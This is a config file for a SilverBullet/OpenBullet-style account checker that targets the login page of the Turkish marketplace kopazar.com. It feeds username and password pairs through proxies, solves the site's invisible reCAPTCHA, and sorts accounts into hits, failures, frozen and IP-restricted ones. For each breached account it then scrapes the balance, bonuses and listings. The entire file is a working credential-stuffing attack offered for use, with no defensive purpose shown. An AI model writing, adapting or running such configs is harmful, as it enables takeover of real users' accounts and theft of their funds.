[SETTINGS]
{
  "Name": "Kopazar.com",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-07-18T20:41:39.8157146+03:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "Raymond",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 1,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "Kopazar",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://www.kopazar.com/login" 
  CONTENT "g-recaptcha-response=<SOLUTION>&customer_mail=<USER>&customer_password=<PASS>&ajax=1&token=<SOLUTION>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "x-kl-ajax-request: Ajax_Request" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Girdi\\u011finiz bilgiler hatal\\u0131." 
    KEY "L\\u00fctfen \\u015fifrenizi giriniz." 
    KEY "L\\u00fctfen mail giriniz." 
    KEY "\\u015eifreniz hatal\\u0131d\\u0131r" 
  KEYCHAIN Success OR 
    KEY "Google G\\u00fcvenlik kodu hatal\\u0131" 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "Kullan\\u0131c\\u0131n\\u0131z dondurulmu\\u015ftur." 

SOLVECAPTCHA ReCaptchaV2 "6LeNCdEUAAAAABKXXienP05lfPxrAU3R2GLqSvJ9" "https://www.kopazar.com/login" IsInvisible=TRUE 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Retry OR 
    KEY "<SOLUTION>" DoesNotContain "0" 

REQUEST POST "https://www.kopazar.com/login" 
  CONTENT "g-recaptcha-response=<SOLUTION>&customer_mail=<USER>&customer_password=<PASS>&ajax=1&token=<SOLUTION>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "x-kl-ajax-request: Ajax_Request" 
  HEADER "x-requested-with: XMLHttpRequest" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Success OR 
    KEY "Ba\\u015far\\u0131 ile giri\\u015f yap\\u0131ld\\u0131.." 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "Ip adresiniz izin verilen ip adresleri i\\u00e7erisinde yer almamaktad\\u0131r." 

REQUEST GET "https://www.kopazar.com/profile" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "<strong>Bakiyem</strong>" "</span>" -> VAR "1" 

PARSE "<1>" LR "<span>" "" CreateEmpty=FALSE -> CAP "Bakiye" 

PARSE "<SOURCE>" LR "<strong>Bonuslarım</strong>" "</span>" -> VAR "2" 

PARSE "<2>" LR "<span>" "" CreateEmpty=FALSE -> CAP "Bonus" 

PARSE "<SOURCE>" LR "<span>İlanlarım</span>" "</strong>" -> VAR "3" 

PARSE "<3>" LR "<strong>" "" CreateEmpty=FALSE -> CAP "İlanları" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<Bakiye>" Contains "0.00 ₺" 

